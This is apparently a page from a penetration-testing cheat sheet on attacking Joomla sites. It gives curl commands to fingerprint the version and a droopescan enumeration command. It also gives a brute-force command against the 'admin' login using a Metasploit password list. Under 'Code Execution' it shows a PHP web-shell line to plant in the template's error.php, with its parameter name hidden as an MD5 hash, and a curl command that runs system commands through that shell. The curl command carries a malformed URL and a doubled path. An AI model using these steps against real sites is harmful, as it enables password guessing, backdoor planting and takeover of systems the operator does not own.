Joomla

Footprinting

# Confirm that site is running Joomla
curl -s <http://site.local/> | grep Joomla

# Fingerprint joomla version 
curl -s <http://site.local/README.txt> | head -n 5

curl -s <http://site.local/administrator/manifests/files/joomla.xml> | xmllint --format -

# cache.xml can give us approximate version, it is located at plugins/system/cache/cache.xml.

Enumeration

# Droopescan installation
sudo pip3 install droopescan

# Normal scan 
droopescan scan joomla --url <http://site.local/>

# Brute Forcing password
# joomla-brute
# LNK : <https://github.com/ajnik/joomla-bruteforce>
sudo python3 joomla-brute.py -u <http://site.local> -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

Attacking Joomla

Code Execution

# Php code to include in error.php page to get code execution
# 'cmd' md5 encoded - dcfdd5e021a869fcc6dfaef8bf31377e
system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']);

# Using curl to execute commands
curl -s http:/site.local/templates/protostar/error.php/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id
PreviousWordpressNextDrupal

Last updated